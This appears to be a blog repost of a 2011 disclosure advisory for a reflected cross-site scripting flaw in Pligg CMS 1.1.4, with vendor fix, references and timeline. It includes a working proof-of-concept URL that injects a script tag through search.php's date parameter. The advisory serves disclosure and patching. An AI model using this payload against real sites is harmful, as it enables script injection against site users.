Description
Pligg is an open source CMS (Content Management System) that you can download and use for free. Pligg CMS provides social publishing software that encourages visitors to register on your website so that they can submit content and connect with other users.
Sow Ching Shiong, an independent vulnerability researcher has discovered Cross-Site Scripting vulnerability in Pligg CMS. This issue was discovered in a default installation of Pligg CMS 1.1.4. Other earlier versions may also be affected.
Proof of concept
http://[target]/pligg/search.php?adv=1&advancesearch= Search &date=1</title><script>alert(/XSS/)</script>&scategory=1&scomments=1&search=&sgroup=3&slink=3&stags=1&status=all&suser=1
Solution
Update to version 1.2.0 or later.
References
Vendor URL: http://forums.pligg.com/downloads.php?do=file&id=13
Secunia: http://secunia.com/advisories/44352/
Disclosure Timeline
2011-04-24 - Vulnerability discovered.
2011-04-24 - Vulnerability reported to Secunia.
2011-04-26 - Secunia confirmed the vulnerability and contacted the vendor.
2011-09-18 - Patch released.
2011-09-20 - Advisory published by Secunia.
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.